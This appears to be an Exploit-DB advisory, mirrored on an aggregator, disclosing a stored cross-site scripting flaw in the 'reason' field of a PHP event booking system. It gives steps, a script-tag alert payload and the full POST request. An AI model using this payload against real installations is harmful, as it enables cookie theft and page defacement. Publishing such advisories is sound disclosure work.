[webapps] Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
2021-10-25 09:00:00 Author: www.exploit-db.com(查看原文) 阅读量:30 收藏

# Exploit Title: Online Event Booking and Reservation System 1.0 - 'reason' Stored Cross-Site Scripting (XSS)
# Exploit Author: Alon Leviev
# Date: 22-10-2021
# Category: Web application
# Vendor Homepage: https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event-management.zip
# Version: 1.0
# Tested on: Linux 
# Vulnerable page: HOLY
# Vulnerable Parameters: "reason"

Technical description:
A stored XSS vulnerability exists in the Event management software. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. 

Steps to exploit:
1) Navigate to http://localhost/event-management/views/?v=HOLY
2) Insert your payload in the "reason" parameter
3) Click "Add holiday"

Proof of concept (Poc):
The following payload will allow you to run the javascript - 
<script>alert("This is an XSS")</script>
---

POST /event-management/api/process.php?cmd=holiday HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Origin: http://localhost
Connection: close
Referer: http://localhost/event-management/views/?v=HOLY&msg=Holiday+record+successfully+deleted.
Cookie: PHPSESSID=3ptqlolbrddvef5a0k8ufb28c9
Upgrade-Insecure-Requests: 1

date=2021-12-21&reason=%3Cscript%3Ealert%28%22This+is+an+xss%22%29%3C%2Fscript%3E

---
            

文章来源: https://www.exploit-db.com/exploits/50450
如有侵权请联系:admin#unsafe.sh